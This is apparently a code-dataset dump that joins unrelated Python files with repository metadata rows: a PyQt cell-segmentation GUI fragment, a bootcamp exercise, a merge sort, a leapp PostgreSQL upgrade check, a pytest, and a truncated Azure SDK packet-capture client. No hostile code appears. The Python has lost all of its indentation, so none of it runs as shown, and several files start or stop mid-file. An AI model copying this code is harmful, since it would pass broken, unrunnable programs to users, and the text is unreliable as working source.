<td>CTRL+L</td>
<td>load image (can alternatively drag and drop image)</td>
</tr>
<tr>
<td>CTRL+S</td>
<td>SAVE MASKS IN IMAGE to <code>_seg.npy</code> file</td>
</tr>
<tr>
<td>CTRL+P</td>
<td>load <code>_seg.npy</code> file (note: it will load automatically with image if it exists)</td>
</tr>
<tr>
<td>CTRL+M</td>
<td>load masks file (must be same size as image with 0 for NO mask, and 1,2,3… for masks)</td>
</tr>
<tr>
<td>CTRL+N</td>
<td>load numpy stack (NOT WORKING ATM)</td>
</tr>
<tr>
<td>A/D or LEFT/RIGHT</td>
<td>cycle through images in current directory</td>
</tr>
<tr>
<td>W/S or UP/DOWN</td>
<td>change color (RGB/gray/red/green/blue)</td>
</tr>
<tr>
<td>PAGE-UP / PAGE-DOWN</td>
<td>change to flows and cell prob views (if segmentation computed)</td>
</tr>
<tr>
<td>, / .</td>
<td>increase / decrease brush size for drawing masks</td>
</tr>
<tr>
<td>X</td>
<td>turn masks ON or OFF</td>
</tr>
<tr>
<td>Z</td>
<td>toggle outlines ON or OFF</td>
</tr>
<tr>
<td>C</td>
<td>cycle through labels for image type (saved to <code>_seg.npy</code>)</td>
</tr>
</tbody>
</table>
<p class="has-line-data" data-line-start="36" data-line-end="37"><strong>Segmentation options (2D only) </strong></p>
<p class="has-line-data" data-line-start="38" data-line-end="39">SIZE: you can manually enter the approximate diameter for your cells, or press “calibrate” to let the model estimate it. The size is represented by a disk at the bottom of the view window (can turn this disk of by unchecking “scale disk on”).</p>
<p class="has-line-data" data-line-start="40" data-line-end="41">use GPU: if you have specially installed the cuda version of mxnet, then you can activate this, but it won’t give huge speedups when running single images in the GUI.</p>
<p class="has-line-data" data-line-start="42" data-line-end="43">MODEL: there is a <em>cytoplasm</em> model and a <em>nuclei</em> model, choose what you want to segment</p>
<p class="has-line-data" data-line-start="44" data-line-end="45">CHAN TO SEG: this is the channel in which the cytoplasm or nuclei exist</p>
<p class="has-line-data" data-line-start="46" data-line-end="47">CHAN2 (OPT): if <em>cytoplasm</em> model is chosen, then choose the nuclear channel for this option</p>
''')
label = QtGui.QLabel(text)
label.setFont(QtGui.QFont("Arial", 8))
label.setWordWrap(True)
layout.addWidget(label, 0, 0, 1, 1)
self.show()
class TypeRadioButtons(QtGui.QButtonGroup):
def __init__(self, parent=None, row=0, col=0):
super(TypeRadioButtons, self).__init__()
parent.color = 0
self.parent = parent
self.bstr = self.parent.cell_types
for b in range(len(self.bstr)):
button = QtGui.QRadioButton(self.bstr[b])
button.setStyleSheet('color: rgb(190,190,190);')
if b==0:
button.setChecked(True)
self.addButton(button, b)
button.toggled.connect(lambda: self.btnpress(parent))
self.parent.l0.addWidget(button, row+b,col,1,2)
self.setExclusive(True)
#self.buttons.
def btnpress(self, parent):
b = self.checkedId()
self.parent.cell_type = b
class RGBRadioButtons(QtGui.QButtonGroup):
def __init__(self, parent=None, row=0, col=0):
super(RGBRadioButtons, self).__init__()
parent.color = 0
self.parent = parent
self.bstr = ["image", "flowsXY", "cellprob", "flowsZ"]
#self.buttons = QtGui.QButtonGroup()
self.dropdown = []
for b in range(len(self.bstr)):
button = QtGui.QRadioButton(self.bstr[b])
button.setStyleSheet('color: white;')
if b==0:
button.setChecked(True)
self.addButton(button, b)
button.toggled.connect(lambda: self.btnpress(parent))
self.parent.l0.addWidget(button, row+b,col,1,1)
self.setExclusive(True)
#self.buttons.
def btnpress(self, parent):
b = self.checkedId()
self.parent.view = b
if self.parent.loaded:
self.parent.update_plot()
class ViewBoxNoRightDrag(pg.ViewBox):
def __init__(self, parent=None, border=None, lockAspect=False, enableMouse=True, invertY=False, enableMenu=True, name=None, invertX=False):
pg.ViewBox.__init__(self, None, border, lockAspect, enableMouse,
invertY, enableMenu, name, invertX)
self.parent = parent
def mouseDragEvent(self, ev, axis=None):
## if axis is specified, event will only affect that axis.
if self.parent is None or (self.parent is not None and not self.parent.in_stroke):
ev.accept() ## we accept all buttons
pos = ev.pos()
lastPos = ev.lastPos()
dif = pos - lastPos
dif = dif * -1
## Ignore axes if mouse is disabled
mouseEnabled = np.array(self.state['mouseEnabled'], dtype=float)  # the np.float alias was removed from NumPy; use the builtin float
mask = mouseEnabled.copy()
if axis is not None:
mask[1-axis] = 0.0
## Scale or translate based on mouse button
if ev.button() & (QtCore.Qt.LeftButton | QtCore.Qt.MidButton):
if self.state['mouseMode'] == pg.ViewBox.RectMode:
if ev.isFinish(): ## This is the final move in the drag; change the view scale now
#print "finish"
self.rbScaleBox.hide()
ax = QtCore.QRectF(Point(ev.buttonDownPos(ev.button())), Point(pos))
ax = self.childGroup.mapRectFromParent(ax)
self.showAxRect(ax)
self.axHistoryPointer += 1
self.axHistory = self.axHistory[:self.axHistoryPointer] + [ax]
else:
## update shape of scale box
self.updateScaleBox(ev.buttonDownPos(), ev.pos())
else:
tr = dif*mask
tr = self.mapToView(tr) - self.mapToView(Point(0,0))
x = tr.x() if mask[0] == 1 else None
y = tr.y() if mask[1] == 1 else None
self._resetTarget()
if x is not None or y is not None:
self.translateBy(x=x, y=y)
self.sigRangeChangedManually.emit(self.state['mouseEnabled'])
class ImageDraw(pg.ImageItem):
"""
**Bases:** :class:`GraphicsObject <pyqtgraph.GraphicsObject>`
GraphicsObject displaying an image. Optimized for rapid update (ie video display).
This item displays either a 2D numpy array (height, width) or
a 3D array (height, width, RGBa). This array is optionally scaled (see
:func:`setLevels <pyqtgraph.ImageItem.setLevels>`) and/or colored
with a lookup table (see :func:`setLookupTable <pyqtgraph.ImageItem.setLookupTable>`)
before being displayed.
ImageItem is frequently used in conjunction with
:class:`HistogramLUTItem <pyqtgraph.HistogramLUTItem>` or
:class:`HistogramLUTWidget <pyqtgraph.HistogramLUTWidget>` to provide a GUI
for controlling the levels and lookup table used to display the image.
"""
sigImageChanged = QtCore.Signal()
def __init__(self, image=None, viewbox=None, parent=None, **kargs):
super(ImageDraw, self).__init__()
#self.image=None
#self.viewbox=viewbox
self.levels = np.array([0,255])
self.lut = None
self.autoDownsample = False
self.axisOrder = 'row-major'
self.removable = False
self.parent = parent
#kernel[1,1] = 1
self.setDrawKernel(kernel_size=self.parent.brush_size)
self.parent.current_stroke = []
self.parent.in_stroke = False
def mouseClickEvent(self, ev):
if self.parent.masksOn or self.parent.outlinesOn:
if self.parent.loaded and (ev.button()==QtCore.Qt.RightButton or
ev.modifiers() == QtCore.Qt.ShiftModifier and not ev.double()):
if not self.parent.in_stroke:
ev.accept()
self.create_start(ev.pos())
self.parent.stroke_appended = False
self.parent.in_stroke = True
self.drawAt(ev.pos(), ev)
else:
ev.accept()
self.end_stroke()
self.parent.in_stroke = False
elif not self.parent.in_stroke:
y,x = int(ev.pos().y()), int(ev.pos().x())
if y>=0 and y<self.parent.Ly and x>=0 and x<self.parent.Lx:
if (ev.button()==QtCore.Qt.LeftButton and ev.modifiers()==QtCore.Qt.ControlModifier
and not ev.double()):
# delete mask selected
idx = self.parent.cellpix[self.parent.currentZ][y,x]
if idx > 0:
self.parent.remove_cell(idx)
elif ev.button()==QtCore.Qt.LeftButton and self.parent.masksOn:
idx = self.parent.cellpix[self.parent.currentZ][int(ev.pos().y()), int(ev.pos().x())]
if idx > 0:
self.parent.unselect_cell()
self.parent.select_cell(idx)
else:
self.parent.unselect_cell()
else:
ev.ignore()
return
def mouseDragEvent(self, ev):
ev.ignore()
return
def hoverEvent(self, ev):
QtWidgets.QApplication.setOverrideCursor(QtCore.Qt.CrossCursor)
if self.parent.in_stroke:
if self.parent.in_stroke:
# continue stroke if not at start
self.drawAt(ev.pos())
if self.is_at_start(ev.pos()):
self.end_stroke()
self.parent.in_stroke = False
else:
ev.acceptClicks(QtCore.Qt.RightButton)
#ev.acceptClicks(QtCore.Qt.LeftButton)
def create_start(self, pos):
self.scatter = pg.ScatterPlotItem([pos.x()], [pos.y()], pxMode=False,
pen=pg.mkPen(color=(255,0,0), width=self.parent.brush_size),
size=max(3*2, self.parent.brush_size*1.8*2), brush=None)
self.parent.p0.addItem(self.scatter)
def is_at_start(self, pos):
thresh_out = max(6, self.parent.brush_size*3)
thresh_in = max(3, self.parent.brush_size*1.8)
# first check if you ever left the start
if len(self.parent.current_stroke) > 3:
stroke = np.array(self.parent.current_stroke)
dist = (((stroke[1:,1:] - stroke[:1,1:][np.newaxis,:,:])**2).sum(axis=-1))**0.5
dist = dist.flatten()
#print(dist)
has_left = (dist > thresh_out).nonzero()[0]
if len(has_left) > 0:
first_left = np.sort(has_left)[0]
has_returned = (dist[max(4,first_left+1):] < thresh_in).sum()
if has_returned > 0:
return True
else:
return False
else:
return False
def end_stroke(self):
self.parent.p0.removeItem(self.scatter)
if not self.parent.stroke_appended:
self.parent.strokes.append(self.parent.current_stroke)
self.parent.stroke_appended = True
self.parent.current_stroke = np.array(self.parent.current_stroke)
ioutline = self.parent.current_stroke[:,3]==1
self.parent.current_point_set.extend(list(self.parent.current_stroke[ioutline]))
self.parent.current_stroke = []
if self.parent.autosave:
self.parent.add_set()
if len(self.parent.current_point_set) > 0 and self.parent.autosave:
self.parent.add_set()
def tabletEvent(self, ev):
pass
#print(ev.device())
#print(ev.pointerType())
#print(ev.pressure())
def drawAt(self, pos, ev=None):
mask = self.greenmask
set = self.parent.current_point_set
stroke = self.parent.current_stroke
pos = [int(pos.y()), int(pos.x())]
dk = self.drawKernel
kc = self.drawKernelCenter
sx = [0,dk.shape[0]]
sy = [0,dk.shape[1]]
tx = [pos[0] - kc[0], pos[0] - kc[0]+ dk.shape[0]]
ty = [pos[1] - kc[1], pos[1] - kc[1]+ dk.shape[1]]
kcent = kc.copy()
if tx[0]<=0:
sx[0] = 0
sx[1] = kc[0] + 1
tx = sx
kcent[0] = 0
if ty[0]<=0:
sy[0] = 0
sy[1] = kc[1] + 1
ty = sy
kcent[1] = 0
if tx[1] >= self.parent.Ly-1:
sx[0] = dk.shape[0] - kc[0] - 1
sx[1] = dk.shape[0]
tx[0] = self.parent.Ly - kc[0] - 1
tx[1] = self.parent.Ly
kcent[0] = tx[1]-tx[0]-1
if ty[1] >= self.parent.Lx-1:
sy[0] = dk.shape[1] - kc[1] - 1
sy[1] = dk.shape[1]
ty[0] = self.parent.Lx - kc[1] - 1
ty[1] = self.parent.Lx
kcent[1] = ty[1]-ty[0]-1
ts = (slice(tx[0],tx[1]), slice(ty[0],ty[1]))
ss = (slice(sx[0],sx[1]), slice(sy[0],sy[1]))
self.image[ts] = mask[ss]
for ky,y in enumerate(np.arange(ty[0], ty[1], 1, int)):
for kx,x in enumerate(np.arange(tx[0], tx[1], 1, int)):
iscent = np.logical_and(kx==kcent[0], ky==kcent[1])
stroke.append([self.parent.currentZ, x, y, iscent])
self.updateImage()
def setDrawKernel(self, kernel_size=3):
bs = kernel_size
kernel = np.ones((bs,bs), np.uint8)
self.drawKernel = kernel
self.drawKernelCenter = [int(np.floor(kernel.shape[0]/2)),
int(np.floor(kernel.shape[1]/2))]
onmask = 255 * kernel[:,:,np.newaxis]
offmask = np.zeros((bs,bs,1))
opamask = 100 * kernel[:,:,np.newaxis]
self.redmask = np.concatenate((onmask,offmask,offmask,onmask), axis=-1)
self.greenmask = np.concatenate((onmask,offmask,onmask,opamask), axis=-1)
class RangeSlider(QtGui.QSlider):
""" A slider for ranges.
This class provides a dual-slider for ranges, where there is a defined
maximum and minimum, as in a normal slider, but instead of having a
single slider value, there are 2 slider values.
This class emits the same signals as the QSlider base class, with the
exception of valueChanged
Found this slider here: https://www.mail-archive.com/pyqt@riverbankcomputing.com/msg22889.html
and modified it
"""
def __init__(self, parent=None, *args):
super(RangeSlider, self).__init__(*args)
self._low = self.minimum()
self._high = self.maximum()
self.pressed_control = QtGui.QStyle.SC_None
self.hover_control = QtGui.QStyle.SC_None
self.click_offset = 0
self.setOrientation(QtCore.Qt.Vertical)
#self.setTickPosition(QtGui.QSlider.TicksRight)
self.setStyleSheet(\
"QSlider::handle:vertical {\
background-color: cyan;\
border: 1px solid white;\
border-radius: 2px;\
border-color: white;\
height: 16px;\
width: 3px;\
margin: 8px 2; \
}")
#self.opt = QtGui.QStyleOptionSlider()
#self.opt.orientation=QtCore.Qt.Vertical
#self.initStyleOption(self.opt)
# 0 for the low, 1 for the high, -1 for both
self.active_slider = 0
self.parent = parent
def level_change(self):
if self.parent is not None:
if self.parent.loaded:
for z in range(self.parent.NZ):
self.parent.saturation[z] = [self._low, self._high]
self.parent.update_plot()
def low(self):
return self._low
def setLow(self, low):
self._low = low
self.update()
def high(self):
return self._high
def setHigh(self, high):
self._high = high
self.update()
def paintEvent(self, event):
# based on http://qt.gitorious.org/qt/qt/blobs/master/src/gui/widgets/qslider.cpp
painter = QtGui.QPainter(self)
style = QtGui.QApplication.style()
for i, value in enumerate([self._low, self._high]):
opt = QtGui.QStyleOptionSlider()
self.initStyleOption(opt)
# Only draw the groove for the first slider so it doesn't get drawn
# on top of the existing ones every time
if i == 0:
opt.subControls = QtGui.QStyle.SC_SliderHandle#QtGui.QStyle.SC_SliderGroove | QtGui.QStyle.SC_SliderHandle
else:
opt.subControls = QtGui.QStyle.SC_SliderHandle
if self.tickPosition() != self.NoTicks:
opt.subControls |= QtGui.QStyle.SC_SliderTickmarks
if self.pressed_control:
opt.activeSubControls = self.pressed_control
opt.state |= QtGui.QStyle.State_Sunken
else:
opt.activeSubControls = self.hover_control
opt.sliderPosition = value
opt.sliderValue = value
style.drawComplexControl(QtGui.QStyle.CC_Slider, opt, painter, self)
def mousePressEvent(self, event):
event.accept()
style = QtGui.QApplication.style()
button = event.button()
# In a normal slider control, when the user clicks on a point in the
# slider's total range, but not on the slider part of the control the
# control would jump the slider value to where the user clicked.
# For this control, clicks which are not direct hits will slide both
# slider parts
if button:
opt = QtGui.QStyleOptionSlider()
self.initStyleOption(opt)
self.active_slider = -1
for i, value in enumerate([self._low, self._high]):
opt.sliderPosition = value
hit = style.hitTestComplexControl(style.CC_Slider, opt, event.pos(), self)
if hit == style.SC_SliderHandle:
self.active_slider = i
self.pressed_control = hit
self.triggerAction(self.SliderMove)
self.setRepeatAction(self.SliderNoAction)
self.setSliderDown(True)
break
if self.active_slider < 0:
self.pressed_control = QtGui.QStyle.SC_SliderHandle
self.click_offset = self.__pixelPosToRangeValue(self.__pick(event.pos()))
self.triggerAction(self.SliderMove)
self.setRepeatAction(self.SliderNoAction)
else:
event.ignore()
def mouseMoveEvent(self, event):
if self.pressed_control != QtGui.QStyle.SC_SliderHandle:
event.ignore()
return
event.accept()
new_pos = self.__pixelPosToRangeValue(self.__pick(event.pos()))
opt = QtGui.QStyleOptionSlider()
self.initStyleOption(opt)
if self.active_slider < 0:
offset = new_pos - self.click_offset
self._high += offset
self._low += offset
if self._low < self.minimum():
diff = self.minimum() - self._low
self._low += diff
self._high += diff
if self._high > self.maximum():
diff = self.maximum() - self._high
self._low += diff
self._high += diff
elif self.active_slider == 0:
if new_pos >= self._high:
new_pos = self._high - 1
self._low = new_pos
else:
if new_pos <= self._low:
new_pos = self._low + 1
self._high = new_pos
self.click_offset = new_pos
self.update()
def mouseReleaseEvent(self, event):
self.level_change()
def __pick(self, pt):
if self.orientation() == QtCore.Qt.Horizontal:
return pt.x()
else:
return pt.y()
def __pixelPosToRangeValue(self, pos):
opt = QtGui.QStyleOptionSlider()
self.initStyleOption(opt)
style = QtGui.QApplication.style()
gr = style.subControlRect(style.CC_Slider, opt, style.SC_SliderGroove, self)
sr = style.subControlRect(style.CC_Slider, opt, style.SC_SliderHandle, self)
if self.orientation() == QtCore.Qt.Horizontal:
slider_length = sr.width()
slider_min = gr.x()
slider_max = gr.right() - slider_length + 1
else:
slider_length = sr.height()
slider_min = gr.y()
slider_max = gr.bottom() - slider_length + 1
return style.sliderValueFromPosition(self.minimum(), self.maximum(),
pos-slider_min, slider_max-slider_min,
opt.upsideDown)
| 42.042445 | 538 | 0.556112 |
| 135552180ceffcb58bc36685e806a055285d3a13 | 1,108 | py | Python | module02/ex01/main.py | kotabrog/bootcamp_python | 41251363d8f62d39451650dcd55e0c1522b1ddcb | ["MIT"] | null | null | null | module02/ex01/main.py | kotabrog/bootcamp_python | 41251363d8f62d39451650dcd55e0c1522b1ddcb | ["MIT"] | null | null | null | module02/ex01/main.py | kotabrog/bootcamp_python | 41251363d8f62d39451650dcd55e0c1522b1ddcb | ["MIT"] | null | null | null |
def what_are_the_vars(*args, **kwargs):
try:
obj = ObjectC()
attr_count = 0
for value in args:
setattr(obj, 'var_' + str(attr_count), value)
attr_count += 1
for key, value in kwargs.items():
if hasattr(obj, key):
raise Exception()
setattr(obj, key, value)
return obj
except Exception:
return None
class ObjectC(object):
def __init__(self):
pass
def doom_printer(obj):
if obj is None:
print("ERROR")
print("end")
return
for attr in dir(obj):
if attr[0] != '_':
value = getattr(obj, attr)
print("{}: {}".format(attr, value))
print("end")
if __name__ == "__main__":
obj = what_are_the_vars(7)
doom_printer(obj)
obj = what_are_the_vars("ft_lol", "Hi")
doom_printer(obj)
obj = what_are_the_vars()
doom_printer(obj)
obj = what_are_the_vars(12, "Yes", [0, 0, 0], a=10, hello="world")
doom_printer(obj)
obj = what_are_the_vars(42, a=10, var_0="world")
doom_printer(obj)
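# --- Illustrative check (not part of the original exercise file) -----------
# The hasattr() guard in what_are_the_vars() makes keyword arguments that
# collide with the generated var_N names return None:
def _collision_demo():
    assert what_are_the_vars(42, a=10, var_0="world") is None  # var_0 collides with the positional var_0=42
    assert getattr(what_are_the_vars(7), 'var_0') == 7
    return True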
| 24.622222 | 70 | 0.554152 |
| f4820bad6a46a7c4ed84a37547aab25e223253d8 | 1,276 | py | Python | 00.Basic_Data_Structure_and_Algorithms/Sortings/merge_sort.py | mr-beaver/CtCI-Exercises | f28a579ca0af110c43cb8b1451efd7786ac573ad | ["MIT"] | null | null | null | 00.Basic_Data_Structure_and_Algorithms/Sortings/merge_sort.py | mr-beaver/CtCI-Exercises | f28a579ca0af110c43cb8b1451efd7786ac573ad | ["MIT"] | null | null | null | 00.Basic_Data_Structure_and_Algorithms/Sortings/merge_sort.py | mr-beaver/CtCI-Exercises | f28a579ca0af110c43cb8b1451efd7786ac573ad | ["MIT"] | null | null | null |
'''
Implementation of Merge Sort
06/24/2018
Do NOT return an array every time and then combine them.
Use a single preallocated result array and write merges into it to save space.
'''
def mergeSort(arr):
if not len(arr):
return []
else:
result = [0] * len(arr)
split(arr, 0, len(arr) - 1, result)
return arr
def split(arr, low, high, result):
#single element, return do not change anything
if low >= high:
return
#multiple element, continue
else:
mid = (low + high) // 2
split(arr, low, mid, result)
split(arr, mid + 1, high, result)
merge(arr, low, mid, high, result)
for i in range(low, high + 1):
arr[i] = result[i]
print("low: {}, high: {}, result: {}".format(low, high, result))
def merge(arr, low, mid, high, result):
i = low
j = mid + 1
count = low
while i <= mid and j <= high:
if arr[i] < arr[j]:
result[count] = arr[i]
i += 1
else:
result[count] = arr[j]
j += 1
count += 1
while i <= mid:
result[count] = arr[i]
count += 1
i += 1
while j <= high:
result[count] = arr[j]
count += 1
j += 1
if __name__ == "__main__":
inputList = input('Please enter a list of integers separated by comma(,): ')
arr = [int(num) for num in inputList.split(',')]
print("The sorted result is {}".format(mergeSort(arr)))
| 20.918033 | 77 | 0.615204 |
| 74ece6285aad79304a4370b589c630218f913da8 | 3,680 | py | Python | repos/system_upgrade/el7toel8/actors/postgresqlcheck/libraries/postgresqlcheck.py | winndows/leapp-repository | e4fd7c3fc14e5630b53998bfa3e4869d3e76cf4f | ["Apache-2.0"] | null | null | null | repos/system_upgrade/el7toel8/actors/postgresqlcheck/libraries/postgresqlcheck.py | winndows/leapp-repository | e4fd7c3fc14e5630b53998bfa3e4869d3e76cf4f | ["Apache-2.0"] | 9 | 2020-01-27T14:20:59.000Z | 2020-02-04T12:58:57.000Z | repos/system_upgrade/el7toel8/actors/postgresqlcheck/libraries/postgresqlcheck.py | winndows/leapp-repository | e4fd7c3fc14e5630b53998bfa3e4869d3e76cf4f | ["Apache-2.0"] | null | null | null |
from leapp import reporting
from leapp.libraries.common.rpms import has_package
from leapp.libraries.stdlib import api
from leapp.models import InstalledRedHatSignedRPM
# Summary for postgresql-server report
report_server_inst_summary = (
'PostgreSQL server component will be upgraded. Since RHEL-8 includes'
' PostgreSQL server 10 by default, which is incompatible with 9.2'
' included in RHEL-7, it is necessary to proceed with additional steps'
' for the complete upgrade of the PostgreSQL data.'
)
report_server_inst_hint = (
'Back up your data before proceeding with the upgrade'
' and follow steps in the documentation section "Migrating to a RHEL 8 version of PostgreSQL"'
' after the upgrade.'
)
# Link URL for postgresql-server report
report_server_inst_link_url = 'https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html-single/deploying_different_types_of_servers/index#migrating-to-a-rhel-8-version-of-postgresql_using-postgresql' # noqa: E501; pylint: disable=line-too-long
# List of dropped extensions from postgresql-contrib package
report_contrib_inst_dropext = ['dummy_seclabel', 'test_parser', 'tsearch2']
# Summary for postgresql-contrib report
report_contrib_inst_summary = (
'Please note that some extensions have been dropped from the'
' postgresql-contrib package and might not be available after'
' the upgrade:{}'
.format(''.join(['\n - {}'.format(i) for i in report_contrib_inst_dropext]))
)
def _report_server_installed():
"""
Create report on postgresql-server package installation detection.
Should remind user about present PostgreSQL server package
installation, warn them about necessary additional steps, and
redirect them to online documentation for the upgrade process.
"""
reporting.create_report([
reporting.Title('PostgreSQL (postgresql-server) has been detected on your system'),
reporting.Summary(report_server_inst_summary),
reporting.Severity(reporting.Severity.MEDIUM),
reporting.Tags([reporting.Tags.SERVICES]),
reporting.ExternalLink(title='Migrating to a RHEL 8 version of PostgreSQL',
url=report_server_inst_link_url),
reporting.RelatedResource('package', 'postgresql-server'),
reporting.Remediation(hint=report_server_inst_hint),
])
def _report_contrib_installed():
"""
Create report on postgresql-contrib package installation detection.
Should remind user about present PostgreSQL contrib package
installation and provide them with a list of extensions no longer
shipped with this package.
"""
reporting.create_report([
reporting.Title('PostgreSQL (postgresql-contrib) has been detected on your system'),
reporting.Summary(report_contrib_inst_summary),
reporting.Severity(reporting.Severity.MEDIUM),
reporting.Tags([reporting.Tags.SERVICES]),
reporting.RelatedResource('package', 'postgresql-contrib')
])
def report_installed_packages(_context=api):
"""
Create reports according to detected PostgreSQL packages.
Create the report if the postgresql-server rpm (RH signed) is installed.
Additionally, create another report if the postgresql-contrib rpm
is installed.
"""
has_server = has_package(InstalledRedHatSignedRPM, 'postgresql-server', _context)
has_contrib = has_package(InstalledRedHatSignedRPM, 'postgresql-contrib', _context)
if has_server:
# postgresql-server
_report_server_installed()
if has_contrib:
# postgresql-contrib
_report_contrib_installed()
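# --- Illustrative test sketch (not part of the actor library) --------------
# report_installed_packages() can be exercised in isolation by substituting
# has_package and the two report helpers; the patch targets below assume this
# module's own import path and are given only as a sketch.
def _smoke_test_reports():
    from unittest import mock
    with mock.patch(__name__ + '.has_package', side_effect=[True, False]), \
         mock.patch(__name__ + '._report_server_installed') as server_report, \
         mock.patch(__name__ + '._report_contrib_installed') as contrib_report:
        report_installed_packages()
        assert server_report.called
        assert not contrib_report.called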
| 40.888889 | 265 | 0.73913 |
| 0593a1620d2d00ae9772d61b767c62fc7cfd51ad | 548 | py | Python | ogusa/tests/test_parameter_tables.py | rkasher/OG-USA | 220651fe7f444e66d838971288b10f6932f405fb | ["CC0-1.0"] | null | null | null | ogusa/tests/test_parameter_tables.py | rkasher/OG-USA | 220651fe7f444e66d838971288b10f6932f405fb | ["CC0-1.0"] | 5 | 2019-08-13T20:04:52.000Z | 2019-11-16T23:10:48.000Z | ogusa/tests/test_parameter_tables.py | rkasher/OG-USA | 220651fe7f444e66d838971288b10f6932f405fb | ["CC0-1.0"] | null | null | null |
'''
Tests of parameter_table.py module
'''
import pytest
import os
from ogusa import utils, parameter_tables
# Load in test results and parameters
CUR_PATH = os.path.abspath(os.path.dirname(__file__))
base_params = utils.safe_read_pickle(
os.path.join(CUR_PATH, 'test_io_data', 'model_params_baseline.pkl'))
base_taxfunctions = utils.safe_read_pickle(
os.path.join(CUR_PATH, 'test_io_data', 'TxFuncEst_baseline.pkl'))
def test_tax_rate_table():
str = parameter_tables.tax_rate_table(base_taxfunctions, base_params)
assert str
| 24.909091 | 73 | 0.775547 |
| 76bfb7cdb622df0668fe8744bcc618274a26ed2c | 32,114 | py | Python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_04_01/operations/_packet_captures_operations.py | LianwMS/azure-sdk-for-python | 612d7bca9de86ee1bd1fa59291d7bf897ba9213f | ["MIT"] | 2 | 2019-05-17T21:24:53.000Z | 2020-02-12T11:13:42.000Z | sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_04_01/operations/_packet_captures_operations.py | LianwMS/azure-sdk-for-python | 612d7bca9de86ee1bd1fa59291d7bf897ba9213f | ["MIT"] | 15 | 2019-07-12T18:18:04.000Z | 2019-07-25T20:55:51.000Z | sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_04_01/operations/_packet_captures_operations.py | LianwMS/azure-sdk-for-python | 612d7bca9de86ee1bd1fa59291d7bf897ba9213f | ["MIT"] | 2 | 2020-05-21T22:51:22.000Z | 2020-05-26T20:53:01.000Z |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class PacketCapturesOperations(object):
"""PacketCapturesOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_04_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _create_initial(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
packet_capture_name, # type: str
parameters, # type: "models.PacketCapture"
**kwargs # type: Any
):
# type: (...) -> "models.PacketCaptureResult"
cls = kwargs.pop('cls', None) # type: ClsType["models.PacketCaptureResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-04-01"
content_type = kwargs.pop("content_type", "application/json")
# Construct URL
url = self._create_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkWatcherName': self._serialize.url("network_watcher_name", network_watcher_name, 'str'),
'packetCaptureName': self._serialize.url("packet_capture_name", packet_capture_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = 'application/json'
# Construct and send request
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'PacketCapture')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('PacketCaptureResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/packetCaptures/{packetCaptureName}'} # type: ignore
def begin_create(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
packet_capture_name, # type: str
parameters, # type: "models.PacketCapture"
**kwargs # type: Any
):
# type: (...) -> LROPoller
"""Create and start a packet capture on the specified VM.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_watcher_name: The name of the network watcher.
:type network_watcher_name: str
:param packet_capture_name: The name of the packet capture session.
:type packet_capture_name: str
:param parameters: Parameters that define the create packet capture operation.
:type parameters: ~azure.mgmt.network.v2020_04_01.models.PacketCapture
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either PacketCaptureResult or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2020_04_01.models.PacketCaptureResult]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
